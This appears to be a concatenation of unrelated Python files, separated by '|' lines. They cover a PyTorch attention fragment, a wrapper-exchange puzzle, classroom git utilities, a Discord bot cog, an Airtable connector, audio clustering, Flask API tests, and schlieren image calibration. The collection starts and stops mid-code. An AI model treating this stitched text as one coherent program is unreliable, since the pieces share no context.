            matrix += torch.log(ious + 1e-6)
        # [N_0, G, N_1]
        matrix = matrix.softmax(dim=2)
        # [N_0 * G, N_1]
        matrix = matrix.view(-1, N_1)
        # [N_0 * G, C] = [N_0 * G, N_1] * [N_1, C]
        y = torch.matmul(matrix, in_ref_x)
        # [N_0, C * G, 1, 1] for the grouped projection
        y = y.view(N_0, -1, 1, 1)
        # [N_0, C]
        y = self.conv_out(y).view(N_0, -1)
        return y
|
# Chocolate-wrapper exchange: with `money` and items costing `item_price`,
# every `exchange_wrapper` wrappers buy one more item; count total items.
# Ported from EOL Python 2 to Python 3: raw_input() -> input(), the print
# statement -> print(), and integer '/' -> '//' (preserving floor-division
# semantics of Python 2 int division).
T = int(input())
for _ in range(0, T):
    money, item_price, exchange_wrapper = [int(x) for x in input().split(' ')]
    bought = money // item_price
    answer = bought
    wrappers = bought
    while wrappers >= exchange_wrapper:
        extra_items = wrappers // exchange_wrapper
        answer += extra_items
        # leftover wrappers plus the wrappers of the newly obtained items
        wrappers = (wrappers % exchange_wrapper) + extra_items
    print(answer)
|
"""
abc-classroom.utils
===================
"""
import os
import subprocess
import sys
import tempfile
import textwrap
from contextlib import contextmanager
from functools import lru_cache
from shutil import copystat, copy2
from IPython import get_ipython
class Error(OSError):
pass
# a copy of shutil.copytree() that is ok with the target directory
# already existing
def copytree(
    src,
    dst,
    symlinks=False,
    ignore=None,
    copy_function=copy2,
    ignore_dangling_symlinks=False,
):
    """Recursively copy a directory tree.

    Unlike shutil.copytree(), the destination directory may already exist;
    it is created with ``os.makedirs(dst, exist_ok=True)`` and existing
    files are overwritten by ``copy_function``.
    If exception(s) occur, an Error is raised with a list of reasons.
    If the optional symlinks flag is true, symbolic links in the
    source tree result in symbolic links in the destination tree; if
    it is false, the contents of the files pointed to by symbolic
    links are copied. If the file pointed by the symlink doesn't
    exist, an exception will be added in the list of errors raised in
    an Error exception at the end of the copy process.
    You can set the optional ignore_dangling_symlinks flag to true if you
    want to silence this exception. Notice that this has no effect on
    platforms that don't support os.symlink.
    The optional ignore argument is a callable. If given, it
    is called with the `src` parameter, which is the directory
    being visited by copytree(), and `names` which is the list of
    `src` contents, as returned by os.listdir():
        ``callable(src, names) -> ignored_names``
    Since copytree() is called recursively, the callable will be
    called once for each directory that is copied. It returns a
    list of names relative to the `src` directory that should
    not be copied.
    The optional copy_function argument is a callable that will be used
    to copy each file. It will be called with the source path and the
    destination path as arguments. By default, copy2() is used, but any
    function that supports the same signature (like copy()) can be used.
    """
    names = os.listdir(src)
    if ignore is not None:
        ignored_names = ignore(src, names)
    else:
        ignored_names = set()
    # tolerate a pre-existing destination (the key difference from shutil)
    os.makedirs(dst, exist_ok=True)
    # errors are collected and raised once at the end so one bad file does
    # not abort the rest of the copy
    errors = []
    for name in names:
        if name in ignored_names:
            continue
        srcname = os.path.join(src, name)
        dstname = os.path.join(dst, name)
        try:
            if os.path.islink(srcname):
                linkto = os.readlink(srcname)
                if symlinks:
                    # We can't just leave it to `copy_function` because legacy
                    # code with a custom `copy_function` may rely on copytree
                    # doing the right thing.
                    os.symlink(linkto, dstname)
                    copystat(srcname, dstname, follow_symlinks=not symlinks)
                else:
                    # ignore dangling symlink if the flag is on
                    if not os.path.exists(linkto) and ignore_dangling_symlinks:
                        continue
                    # otherwise let the copy occurs. copy2 will raise an error
                    if os.path.isdir(srcname):
                        copytree(
                            srcname, dstname, symlinks, ignore, copy_function
                        )
                    else:
                        copy_function(srcname, dstname)
            elif os.path.isdir(srcname):
                copytree(srcname, dstname, symlinks, ignore, copy_function)
            else:
                # Will raise a SpecialFileError for unsupported file types
                copy_function(srcname, dstname)
        # catch the Error from the recursive copytree so that we can
        # continue with other files
        except Error as err:
            errors.extend(err.args[0])
        except OSError as why:
            errors.append((srcname, dstname, str(why)))
    try:
        copystat(src, dst)
    except OSError as why:
        # Copying file access times may fail on Windows
        if getattr(why, "winerror", None) is None:
            errors.append((src, dst, str(why)))
    if errors:
        raise Error(errors)
    return dst
def input_editor(default_message=None):
    """Ask for user input via a text editor.

    Opens the user's editor ($VISUAL/$EDITOR, falling back to ``vi``) on a
    temporary file optionally seeded with *default_message*, and returns the
    edited text stripped of surrounding whitespace.
    """
    # BUG FIX: dedent() was called before the None check, so calling this
    # function with the default argument raised TypeError.
    if default_message is not None:
        default_message = textwrap.dedent(default_message)
    with tempfile.NamedTemporaryFile(mode="r+") as tmpfile:
        if default_message is not None:
            tmpfile.write(default_message)
            tmpfile.flush()
        subprocess.check_call([get_editor(), tmpfile.name])
        # re-open by name: the editor may have replaced the file contents
        tmpfile.seek(0)
        with open(tmpfile.name) as f:
            msg = f.read()
        return msg.strip()
def get_editor():
    """Return the user's editor command: $VISUAL, then $EDITOR, then ``vi``."""
    for var in ("VISUAL", "EDITOR"):
        editor = os.environ.get(var)
        if editor:
            return editor
    return "vi"
def _call_git(*args, directory=None):
    """Run ``git *args`` in *directory* and return the CompletedProcess.

    :raises RuntimeError: with a trimmed message when git exits non-zero.
    """
    cmd = ["git"]
    cmd.extend(args)
    try:
        ret = subprocess.run(
            cmd,
            cwd=directory,
            check=True,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
        )
    except subprocess.CalledProcessError as e:
        err = e.stderr.decode("utf-8")
        if err:
            # git errors usually look like "fatal: <reason>"; keep the reason.
            # BUG FIX: guard the split -- messages without a colon used to
            # raise IndexError here, masking the real error.
            msg = err.split(":", 1)[1].strip() if ":" in err else err.strip()
        else:
            msg = e.stdout.decode("utf-8")
        raise RuntimeError(msg) from e
    return ret
@lru_cache(1)
def TOP():
    """Path to the top level of the repository we are in (cached)."""
    try:
        result = _call_git("rev-parse", "--show-toplevel")
    except RuntimeError as e:
        # not inside a git repository: report and abort
        print(" ".join(e.args))
        sys.exit(1)
    else:
        return result.stdout.decode("utf-8").strip()
def P(*paths):
    """Construct absolute path inside the repository from `paths`"""
    return os.path.join(TOP(), os.path.join(*paths))
def flush_inline_matplotlib_plots():
    """
    Flush matplotlib plots immediately, rather than asynchronously.
    Basically, the inline backend only shows the plot after the entire
    cell executes, which means we can't easily use a contextmanager to
    suppress displaying it. See https://github.com/jupyter-widgets/ipywidgets/issues/1181/
    and https://github.com/ipython/ipython/issues/10376 for more details. This
    function displays flushes any pending matplotlib plots if we are using
    the inline backend.
    Stolen from https://github.com/jupyter-widgets/ipywidgets/blob/4cc15e66d5e9e69dac8fc20d1eb1d7db825d7aa2/ipywidgets/widgets/interaction.py#L35
    """
    if "matplotlib" not in sys.modules:
        # matplotlib hasn't been imported, nothing to do.
        return
    try:
        import matplotlib as mpl
        from ipykernel.pylab.backend_inline import flush_figures
    except ImportError:
        return
    if mpl.get_backend() != "module://ipykernel.pylab.backend_inline":
        # not the inline backend: nothing pending to flush
        return
    flush_figures()
@contextmanager
def hide_outputs():
    """
    Context manager for hiding outputs from display() calls.
    IPython handles matplotlib outputs specially, so those are suppressed too.
    """
    ipy = get_ipython()
    if ipy is None:
        # Not running inside ipython: nothing to suppress.
        yield
        return
    saved_formatters = ipy.display_formatter.formatters
    ipy.display_formatter.formatters = {}
    try:
        yield
    finally:
        # always restore, even if the body raised
        ipy.display_formatter.formatters = saved_formatters
@contextmanager
def chdir(path):
    """Change working directory to `path` and restore old path on exit.
    `path` can be `None` in which case this is a no-op.
    """
    if path is None:
        yield
        return
    previous = os.getcwd()
    os.chdir(path)
    try:
        yield
    finally:
        os.chdir(previous)
|
"""
Solution to an exercise from
Think Python: An Introduction to Software Design
Allen B. Downey
This program requires Gui.py, which is part of
Swampy; you can download it from thinkpython.com/swampy.
This program started with a recipe by Noah Spurrier at
http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/521918
"""
import os, sys
from Gui import *
import Image as PIL # to avoid name conflict with Tkinter
import ImageTk
class ImageBrowser(Gui):
    """An image browser that scans the files in a given directory and
    displays any images that can be read by PIL.

    (Python 2 / Swampy code: uses the print statement and old PIL imports.)
    """
    def __init__(self):
        Gui.__init__(self)
        # clicking on the image breaks out of mainloop
        self.button = self.bu(command=self.quit, relief=FLAT)

    def image_loop(self, dirname='.'):
        """loop through the files in (dirname), displaying
        images and skipping files PIL can't read.
        """
        files = os.listdir(dirname)
        for file in files:
            try:
                self.show_image(file)
                print file
                # mainloop() blocks until the button is clicked (self.quit)
                self.mainloop()
            except IOError:
                # PIL could not read this file; skip it
                continue
            except:
                # any other error stops the slideshow
                # NOTE(review): bare except also swallows KeyboardInterrupt
                break

    def show_image(self, filename):
        """Use PIL to read the file and ImageTk to convert
        to a PhotoImage, which Tk can display.
        """
        image = PIL.open(filename)
        # keep a reference on self so the PhotoImage isn't garbage-collected
        self.tkpi = ImageTk.PhotoImage(image)
        self.button.config(image=self.tkpi)
def main(script, dirname='.'):
    """Entry point: browse all images found in `dirname` (defaults to cwd).

    `script` receives sys.argv[0] and is unused.
    """
    g = ImageBrowser()
    g.image_loop(dirname)

if __name__ == '__main__':
    # Usage: python <script> [dirname]
    main(*sys.argv)
|
import random
import discord
import discord.ext.commands as commands
from .util import checks
# Discord IDs are passed as strings (discord.py v0.x style API).
SHIMMY_SERVER_ID = '140880261360517120'
NSFW_ROLE_ID = '261189004681019392'

# Classic Magic 8-Ball answers, grouped by sentiment.
eight_ball_responses = [
    # Positive
    "It is certain",
    "It is decidedly so",
    "Without a doubt",
    "Yes, definitely",
    "You may rely on it",
    "As I see it, yes",
    "Most likely",
    "Outlook good",
    "Yes",
    "Signs point to yes",
    # Non-committal
    "Reply hazy try again",
    "Ask again later",
    "Better not tell you now",
    "Cannot predict now",
    "Concentrate and ask again",
    # Negative
    "Don't count on it",
    "My reply is no",
    "My sources say no",
    "Outlook not so good",
    "Very doubtful"
]
def setup(bot):
    """Extension entry point: attach the Shimmy cog to the bot."""
    bot.add_cog(Shimmy(bot))
class Shimmy:
    """Commands exclusive to Shimmy's discord server."""
    def __init__(self, bot):
        self.bot = bot

    @commands.command(pass_context=True, no_pm=True)
    @checks.in_server(SHIMMY_SERVER_ID)
    async def nsfw(self, ctx):
        """Tries to add the NSFW role to a member."""
        await self.bot.add_roles(ctx.message.author, discord.Object(id=NSFW_ROLE_ID))
        # Short-lived confirmation; the invoking message is deleted to keep
        # the channel clean.
        await self.bot.say('\N{WHITE HEAVY CHECK MARK} Access granted.', delete_after=3)
        await self.bot.delete_message(ctx.message)

    @commands.command(aliases=['eight', '8'])
    @checks.in_server(SHIMMY_SERVER_ID)
    async def ball(self, *, question):
        """Scarecrow's 8-Ball reaches into the future, to find the answers to your questions.

        It knows what will be, and is willing to share this with you. Just send a question that can be answered by
        "Yes" or "No", then let Scarecrow's 8-Ball show you the way !
        """
        # The question text itself is ignored; an answer is drawn at random.
        await self.bot.say(random.choice(eight_ball_responses))
|
from tars_data_models.spendy.transaction import Transaction |
import os
from pyairtable import Table, Base, Api
from abc import ABC, abstractmethod
class DB_Connector(ABC):
    """Abstract interface for obtaining Airtable API/Base/Table handles."""

    @abstractmethod
    def Get_Api(self):
        """Return an API client handle."""
        pass

    @abstractmethod
    def Get_Base(self):
        """Return a handle to the configured base."""
        pass

    @abstractmethod
    def Get_Table(self, table_name: str):
        """Return a handle to the named table within the configured base."""
        pass
class PyAirtable_DB_Connector(DB_Connector):
    """pyairtable-backed connector; credentials come from the environment."""

    def __init__(self):
        # Raises KeyError if either variable is missing from the environment.
        self.api_key = os.environ['AIRTABLE_API_KEY']
        self.base_id = os.environ['AIRTABLE_BASE_ID']

    def Get_Api(self):
        """Return a pyairtable Api built from the configured API key."""
        return Api(self.api_key)

    def Get_Base(self):
        """Return a pyairtable Base for the configured base id."""
        return Base(self.api_key, self.base_id)

    def Get_Table(self, table_name: str):
        """Return a pyairtable Table for `table_name` in the configured base."""
        return Table(self.api_key, self.base_id, table_name)
# class DB_2(DB_operator):
# def __init__(self):
# self.api_key = os.environ['AIRTABLE_API_KEY']
# self.base_id = os.environ['AIRTABLE_BASE_ID']
# self.base = Base(self.api_key, self.base_id)
# def get_base(self):
# return self.base
# def get_table(self, table_name: str):
# self.table = Table(self.api_key, self.base_id, table_name)
# return self.table
# class UseDB():
# def usedb(db_operator: DB_operator):
# return db_operator.get_base()
# db1 = DB_1()
# db2 = DB_2()
# UseDB().usedb(db1) |
import numpy as np
import matplotlib.pyplot as plt
import argparse
from random import shuffle
from mpl_toolkits.mplot3d import Axes3D
from tqdm import *
from sklearn.cluster import KMeans
from sklearn.preprocessing import normalize
from pymongo import MongoClient
from scipy.spatial import distance
from sklearn.metrics import silhouette_score
from sklearn.decomposition import PCA
from pydub import AudioSegment
def main():
    """Cluster audio grains stored in MongoDB with KMeans and write one
    concatenated wav file per cluster into soundGroups/.

    Which grain features are used is controlled entirely by command-line
    flags; see parseArgs() for the available options.
    """
    args = parseArgs()
    numClusters = args.numClusters
    estimator = KMeans(n_clusters=numClusters, n_jobs=-1, n_init=20, precompute_distances='auto')
    print("Num Clusters: " + str(numClusters))

    # Gather grains into numpy array
    client = MongoClient()
    db = client.audiograins
    grainEntries = db.grains

    query = grainEntries.find({})
    indexToFilename = [None] * query.count()
    numXBins = args.numXBins
    numBinergies = args.numBinergies
    numLogBinergies = args.numLogBinergies
    numMFCCs = args.numMFCCs
    numRatios = args.numRatios

    # Build the list of mongo document keys to pull as features.
    features = []
    if args.rolloff:
        features.extend(["rolloff"])
    if args.energy:
        features.extend(["energy"])
    if args.zcr:
        features.extend(["zcr"])
    if args.centroid:
        features.extend(["centroid"])
    if args.spread:
        features.extend(["spread"])
    if args.skewness:
        features.extend(["skewness"])
    if args.kurtosis:
        features.extend(["kurtosis"])

    # Binned features are stored under zero-padded keys, e.g. "binergy07".
    nameFormat = "binergy%0" + str(len(str(numBinergies))) + "d"
    for binNum in range(numBinergies):
        features.append(nameFormat % binNum)

    nameFormat = "xBin%0" + str(len(str(numXBins))) + "d"
    for binNum in range(numXBins):
        features.append(nameFormat % binNum)

    nameFormat = "logbinergies%0" + str(len(str(numLogBinergies))) + "d"
    for binNum in range(numLogBinergies):
        features.append(nameFormat % binNum)

    nameFormat = "hratio%02d"
    for binNum in range(numRatios):
        features.append(nameFormat % binNum)

    nameFormat = "mfcc%02d"
    for binNum in range(numMFCCs):
        features.append(nameFormat % binNum)

    numFeatures = len(features)
    data = np.empty([query.count(), numFeatures])

    dataIndex = 0
    for grain in tqdm(query):
        featureNum = 0
        for feature in features:
            data[dataIndex][featureNum] = grain[feature]
            featureNum += 1
        indexToFilename[dataIndex] = grain["file"]
        dataIndex += 1
    print("Data pulled")

    ## Fit data, label, and put files in buckets
    print("Normalizing Data")
    if np.any(np.isnan(data)):
        print("Some data is NaN")
    if not np.all(np.isfinite(data)):
        print("Some data is infinite")
    # BUG FIX: sklearn's normalize() returns a normalized copy; the original
    # call discarded the result, so clustering ran on unnormalized data.
    data = normalize(data)
    estimator.fit(data)
    buckets = [None] * numClusters
    dataIndex = 0
    for label in estimator.labels_:
        if buckets[label] is None:
            buckets[label] = []
        buckets[label].append(indexToFilename[dataIndex])
        dataIndex += 1

    bucketIndex = 0
    for bucket in buckets:
        if not bucket:
            # KMeans can occasionally leave a cluster empty; skip it rather
            # than crash on shuffle(None) / exporting a nonexistent song.
            bucketIndex += 1
            continue
        song = None
        shuffle(bucket)
        print("Writing sound file for bucket " + str(bucketIndex) + " With " + str(len(bucket)) + "samples")
        for grainFile in tqdm(bucket):
            grain = AudioSegment.from_wav(grainFile)
            if song is None:
                song = grain
            else:
                # crossfade (ms) smooths the grain-to-grain transitions
                song = song.append(grain, crossfade=10)
        song.export("soundGroups/grouping" + str(bucketIndex) + ".wav", format="wav")
        bucketIndex += 1

    print("Silhouette score:" + str(silhouette_score(data, estimator.labels_, metric='euclidean')))
def parseArgs():
    """Parse command-line options selecting clustering features and sizes.

    Returns
    -------
    argparse.Namespace
        Parsed options; numeric counts default to 0 (feature disabled) and
        boolean feature toggles default to False.
    """
    parser = argparse.ArgumentParser(description='Cluster grains based on values computed using an analyzer whose results are available in a mongo database')
    # Numeric options: cluster count plus how many of each binned feature.
    parser.add_argument('-numClusters', '--numClusters', nargs='?', default=10, type=int)
    parser.add_argument('-numXBins', '--numXBins', nargs='?', default=0, type=int)
    parser.add_argument('-numBinergies', '--numBinergies', nargs='?', default=0, type=int)
    parser.add_argument('-numLogBinergies', '--numLogBinergies', nargs='?', default=0, type=int)
    parser.add_argument('-numMFCCs', '--numMFCCs', nargs='?', default=0, type=int)
    parser.add_argument('-numRatios', '--numRatios', nargs='?', default=0, type=int)
    # Boolean feature toggles. store_true implies default=False, so the
    # redundant set_defaults(...) calls were removed.
    parser.add_argument('--rolloff', dest='rolloff', action='store_true', help='use spectral rolloff in clustering')
    parser.add_argument('--energy', dest='energy', action='store_true', help='use signal energy in clustering')
    parser.add_argument('--zcr', dest='zcr', action='store_true', help='use signal zero crossing rate in clustering')
    parser.add_argument('--centroid', dest='centroid', action='store_true', help='use the spectral centroid in clustering')
    parser.add_argument('--spread', dest='spread', action='store_true', help='use the spectral spread in clustering')
    parser.add_argument('--skewness', dest='skewness', action='store_true', help='use the spectral skewness in clustering')
    parser.add_argument('--kurtosis', dest='kurtosis', action='store_true', help='use the spectral kurtosis in clustering')
    return parser.parse_args()
if __name__ == "__main__":
    # Run the clustering pipeline when invoked as a script.
    main()
|
from flask import url_for
def test_hostgroups(client, access_token):
    """The hostgroup list endpoint returns the default sshportal group."""
    headers = {'authorization': f"Bearer {access_token}"}
    res = client.get(url_for('hostgroups'), headers=headers)
    assert res.status_code == 200
    group = res.json[0]
    assert group['id'] == 1
    assert group['name'] == "default"
    assert group['comment'] == "created by sshportal"
    assert 'acls' in group
    assert 'hosts' in group
    assert group['acls'][0]['id'] == 1
    assert group['acls'][0]['comment'] == "created by sshportal"
def test_hostgroup_id(client, access_token):
    """Looking a hostgroup up by id returns the default sshportal group."""
    headers = {'authorization': f"Bearer {access_token}"}
    res = client.get(url_for('hostgroupid', id=1), headers=headers)
    assert res.status_code == 200
    body = res.json
    assert body['id'] == 1
    assert body['name'] == "default"
    assert body['comment'] == "created by sshportal"
    assert 'acls' in body
    assert 'hosts' in body
    assert body['acls'][0]['id'] == 1
    assert body['acls'][0]['comment'] == "created by sshportal"
def test_hostgroup_name(client, access_token):
    """Looking a hostgroup up by name returns the default sshportal group."""
    headers = {'authorization': f"Bearer {access_token}"}
    res = client.get(
        url_for('hostgroupname', name="default"),
        headers=headers
    )
    assert res.status_code == 200
    body = res.json
    assert body['id'] == 1
    assert body['name'] == "default"
    assert body['comment'] == "created by sshportal"
    assert 'acls' in body
    assert 'hosts' in body
    assert body['acls'][0]['id'] == 1
    assert body['acls'][0]['comment'] == "created by sshportal"
|
'''
Configures logger
'''
import logging
import os

# Delete previous debug log so each run starts with a fresh file.
if os.path.exists("debug.log"):
    os.remove("debug.log")

# Initialize logger: INFO level, UTF-8 file handler writing to debug.log.
FORMAT = '[%(levelname)s] - %(asctime)s: %(message)s'
logging.basicConfig(handlers=[logging.FileHandler(filename='debug.log', encoding='utf-8', mode='a+')],
                    level=logging.INFO,
                    format=FORMAT,
                    datefmt='%H:%M:%S')
logging.info("----------------Start-----------------")
|
__author__ = "Christian Kongsgaard"
__license__ = 'MIT'
# -------------------------------------------------------------------------------------------------------------------- #
# IMPORTS
# Modules
import matplotlib.pyplot as plt
# RiBuild Modules
from delphin_6_automation.database_interactions import mongo_setup
from delphin_6_automation.database_interactions.auth import validation as auth_dict
from delphin_6_automation.backend import result_extraction
# -------------------------------------------------------------------------------------------------------------------- #
# RIBuild
# Open the database connection used by the result-extraction calls below.
server = mongo_setup.global_init(auth_dict)

# Example filter dicts of increasing specificity; only `filters_none`
# (no filtering) is actually used below.
filters_none = {}
filters = {'exterior_climate': 'MuenchenAirp',}
filters2 = {'exterior_climate': 'MuenchenAirp', 'wall_orientation': [200, 250]}
filters3 = {'exterior_climate': 'MuenchenAirp', 'wall_orientation': [200, 250], 'wall_core_thickness': 48}
filters4 = {'exterior_climate': 'MuenchenAirp', 'wall_orientation': [200, 250], 'system_name': 'Calsitherm'}
filters5 = {'exterior_climate': 'MuenchenAirp', 'rain_scale_factor': [0.0, 0.15]}

projects = result_extraction.filter_db(filters_none)
def lookup(projects_):
    """Print the distinct wall orientations and rain scale factors found in
    the sample data of the given projects."""
    orientations = {p.sample_data['wall_orientation'] for p in projects_}
    rain_factors = {p.sample_data['rain_scale_factor'] for p in projects_}
    print(f'Orientations: {sorted(orientations)}')
    print(f'Rain: {sorted(rain_factors)}')
#lookup(projects)

# Plot the cumulative distribution of heat loss over the selected projects.
x, y = result_extraction.compute_cdf(projects, 'heat_loss')
#a = np.nonzero(x < 2.0)
#print(y[a][-1])

plt.figure()
plt.plot(x, y)
plt.show()

# Close the connection opened at the top of the script.
mongo_setup.global_end_ssh(server)
|
import os
import warnings
import numpy as np
import pandas as pd
import uncertainties as un
import uncertainties.unumpy as unp
from matplotlib import pyplot as plt
from matplotlib import widgets
from skimage import io
from skimage.filters import sobel_v
from ...dir import d_drive, convert_dir_to_local
from ...uncertainty import add_uncertainty_terms, u_cell
u_cell = u_cell["schlieren"]
def get_spatial_dir(
        date,
        base_dir=os.path.join(
            d_drive,
            "Data",
            "Raw"
        )
):
    """
    Locate the spatial calibration directory for a given test date.

    Date directories containing a ".old" entry keep spatial images under
    Camera/spatial; all others keep them directly under spatial. A missing
    directory produces a warning and a NaN return value.

    Parameters
    ----------
    date : str
        Date directory name to look in
    base_dir : str
        Root directory of raw data

    Returns
    -------
    str or float
        Path of the spatial directory, or NaN if it does not exist
    """
    day_dir = os.path.join(base_dir, date)
    if ".old" in os.listdir(day_dir):
        spatial_dir = os.path.join(day_dir, "Camera", "spatial")
    else:
        spatial_dir = os.path.join(day_dir, "spatial")

    if os.path.exists(spatial_dir):
        return spatial_dir

    warnings.warn("directory not found: %s" % spatial_dir)
    return np.NaN
def get_varied_spatial_dir(
        spatial_date_dir,
        spatial_dir_name,
        base_dir=os.path.join(
            d_drive,
            "Data",
            "Raw"
        )
):
    """
    Build the path to a non-standard spatial calibration directory.

    Some days got weird due to overnight testing, which means that tests on
    those days may have a weird spatial calibration image location.

    Parameters
    ----------
    spatial_date_dir : str
        Date directory holding the calibration images
    spatial_dir_name : str
        Name of the spatial directory within the date directory
    base_dir : str
        Root directory of raw data

    Returns
    -------
    str or float
        Path of the directory, or NaN (with a warning) if it doesn't exist
    """
    target = os.path.join(
        base_dir,
        spatial_date_dir,
        spatial_dir_name,
    )
    if os.path.exists(target):
        return target

    warnings.warn("directory not found: %s" % target)
    return np.NaN
def get_spatial_loc(
        date,
        which="near",
        base_dir=os.path.join(
            d_drive,
            "Data",
            "Raw"
        )
):
    """
    Build full path(s) to the near/far spatial calibration image(s) for a
    test date.

    Parameters
    ----------
    date : str
        Date directory name to look in
    which : str
        One of "near", "far", or "both"
    base_dir : str
        Root directory of raw data

    Returns
    -------
    str or list
        Single image path, or [near, far] when which="both"

    Raises
    ------
    ValueError
        For any `which` other than "near", "far", or "both"
    """
    spatial_dir = get_spatial_dir(
        date,
        base_dir
    )
    near_name = "near.tif"
    far_name = "far.tif"
    if which == "near":
        return os.path.join(spatial_dir, near_name)
    if which == "far":
        return os.path.join(spatial_dir, far_name)
    if which == "both":
        return [
            os.path.join(spatial_dir, near_name),
            os.path.join(spatial_dir, far_name),
        ]
    raise ValueError("bad value of `which`")
def find_images_in_dir(
        directory,
        data_type=".tif"
):
    """
    Finds all files in a directory of the given file type. This function
    should be applied to either a `bg` or `frames` directory from a single
    day of testing.

    Parameters
    ----------
    directory : str
        Directory to search
    data_type : str
        File extension to search for, e.g. ".tif"

    Returns
    -------
    List[str]
        Sorted full paths of all matching files
    """
    # str.endswith replaces the fragile negative-slice comparison
    # (f[-len(data_type):] == data_type), which misbehaved for an empty
    # suffix and is harder to read.
    return sorted(
        os.path.join(directory, f)
        for f in os.listdir(directory)
        if f.endswith(data_type)
    )
def find_shot_images(
        dir_shot,
        data_type=".tif"
):
    """
    Collects all background and frame images for a single shot directory.
    Shot directory should contain `bg` and `frames` sub-directories.

    Parameters
    ----------
    dir_shot : str
        Shot directory to collect images from
    data_type : str
        File type of schlieren images

    Returns
    -------
    list
        [[background image paths], [frame image paths]]
    """
    found = {"bg": [], "frames": []}
    for root, _, _ in os.walk(dir_shot):
        leaf = os.path.split(root)[1]
        if leaf in found:
            found[leaf] = find_images_in_dir(root, data_type=data_type)
    return [found["bg"], found["frames"]]
def average_frames(frame_paths):
    """
    Averages all frames contained within a list of paths

    Parameters
    ----------
    frame_paths : list
        Paths of the image frames to average

    Returns
    -------
    np.array
        Average image as a numpy array of float64 values
    """
    frames = [io.imread(path) for path in frame_paths]
    return np.array(frames, dtype="float64").mean(axis=0)
def bg_subtract_all_frames(dir_raw_shot):
    """
    Subtract the averaged background from all frames of schlieren data in a
    given shot.

    Parameters
    ----------
    dir_raw_shot : str
        Directory containing raw shot data output. Should have `bg` and
        `frames` sub-directories.

    Returns
    -------
    list
        List of background subtracted arrays
    """
    bg_paths, frame_paths = find_shot_images(dir_raw_shot)
    background = average_frames(bg_paths)
    # The 2**15 offset re-centers each subtracted image at mid-range.
    return [io.imread(path) - background + 2**15 for path in frame_paths]
def _maximize_window():
    # Maximize the current matplotlib figure window, dispatching on the
    # active GUI backend (each backend exposes a different window API).
    # https://stackoverflow.com/questions/12439588/how-to-maximize-a-plt-show-window-using-python
    plt_backend = plt.get_backend()
    mng = plt.get_current_fig_manager()
    if "Qt" in plt_backend:
        mng.window.showMaximized()
        return True
    elif "wx" in plt_backend:
        mng.frame.Maximize(True)
        return True
    elif "Tk" in plt_backend:
        mng.window_state('zoomed')
        return True
    else:
        # Unknown backend: leave the window alone and report failure.
        print("figure out how to maximize for ", plt_backend)
        return False
def collect_spatial_calibration(
        spatial_file,
        line_color="r",
        marker_length_mm=5.08,
        px_only=False,
        apply_uncertainty=True,
        plot_window=None,
        msg_box=None
):  # pragma: no cover
    """
    Interactively measure a spatial calibration image and return mm/px.

    The image is shown with a draggable line (LineBuilder); the user aligns
    it with a known number of grid markers and then enters that count via a
    console prompt, or via `msg_box` when invoked from the Qt gui. The
    physical line length is num_boxes * marker_length_mm.

    Parameters
    ----------
    spatial_file : str
        Path of the calibration image to read
    line_color : str
        Matplotlib color of the interactive line
    marker_length_mm : float
        Physical length of one grid marker (mm)
    px_only : bool
        If True, return the raw pixel distance instead of mm/px
    apply_uncertainty : bool
        If True, attach measurement uncertainty to the result
    plot_window
        Qt plot window; None means plain matplotlib interaction
    msg_box
        Qt dialog class used to ask for the marker count (Qt path only)

    Returns
    -------
    float or un.ufloat or np.ndarray
        mm/px calibration factor, or pixel distance when px_only=True
    """
    image = io.imread(spatial_file)
    if plot_window is not None:
        # called from Qt gui
        ax = plot_window.ax
        fig = plot_window.fig
    else:
        # not called form Qt gui
        fig, ax = plt.subplots(1, 1)
        fig.canvas.manager.window.move(0, 0)
    ax.axis("off")
    ax.imshow(image)
    cal_line = widgets.Line2D(
        [0, 100],
        [0, 100],
        c=line_color
    )
    ax.add_line(cal_line)

    # noinspection PyTypeChecker
    linebuilder = LineBuilder(cal_line)

    if plot_window is not None:
        # called from Qt gui
        plot_window.imshow(image)
        plot_window.exec_()
        if msg_box is None:
            # noinspection SpellCheckingInspection
            raise ValueError("Lazy dev didn't error handle this! Aaahh!")
        num_boxes = msg_box().num_boxes
    else:
        # not called from Qt gui
        _maximize_window()
        plt.tight_layout()
        plt.show(block=True)
        # keep prompting until the user enters a parseable number
        while True:
            try:
                num_boxes = float(input("number of markers: "))
                break
            except ValueError:
                pass

    # I built the input to this in a bad way. The nominal value is the size of
    # an engineering paper box, and the std_dev is the resolution error of a
    # single line. The error should be applied at either end of the calibration
    # line, i.e. the error should be the same regardless of line length. To
    # make this happen, I am breaking out the components and applying them as
    # originally intended.
    line_length_mm = num_boxes * marker_length_mm

    if apply_uncertainty:
        line_length_mm = un.ufloat(
            line_length_mm,
            add_uncertainty_terms([
                u_cell["l_mm"]["b"],
                u_cell["l_mm"]["p"]
            ])
        )

    if px_only:
        return _get_cal_delta_px(linebuilder.xs, linebuilder.ys)
    else:
        mm_per_px = _calibrate(
            linebuilder.xs,
            linebuilder.ys,
            line_length_mm,
            apply_uncertainty=apply_uncertainty
        )
        return mm_per_px
def measure_single_frame(
        image_array,
        lc="r"
):
    """
    Interactively collect triple-point locations from a single frame.

    Parameters
    ----------
    image_array : np.ndarray
        Frame to measure
    lc : str
        Matplotlib color used for the measurement lines

    Returns
    -------
    np.ndarray
        Sorted measured locations with pixel uncertainty attached
    """
    collector = MeasurementCollector(image_array, lc=lc)
    _maximize_window()
    measurements = collector.get_data()
    del collector
    return measurements
def _get_cal_delta_px(
x_data,
y_data
):
return np.sqrt(
np.square(np.diff(x_data)) +
np.square(np.diff(y_data))
)
def _calibrate(
        x_data,
        y_data,
        line_length_mm,
        apply_uncertainty=True
):
    """
    Calculates a calibration factor to convert pixels to mm by dividing
    the known line length in mm by the L2 norm between two pixels.

    Parameters
    ----------
    x_data : iterable
        X locations of two points
    y_data : iterable
        Y locations of two points
    line_length_mm : float
        Length, in mm, of the line between (x0, y0), (x1, y1)
    apply_uncertainty : bool
        Applies pixel uncertainty if True

    Returns
    -------
    float or un.ufloat
        Pixel linear pitch in mm/px
    """
    line_length_px = _get_cal_delta_px(x_data, y_data)
    # NOTE(review): _get_cal_delta_px returns a length-1 array for two-point
    # input, and that array is passed directly to un.ufloat below -- confirm
    # the uncertainties package handles this as intended.

    if apply_uncertainty:
        line_length_px = un.ufloat(
            line_length_px,
            add_uncertainty_terms([
                u_cell["l_px"]["b"],
                u_cell["l_px"]["p"]
            ])
        )

    return line_length_mm / line_length_px
class LineBuilder(object):  # pragma: no cover
    # I'm not sure how to automate tests on this, it works right now, and I
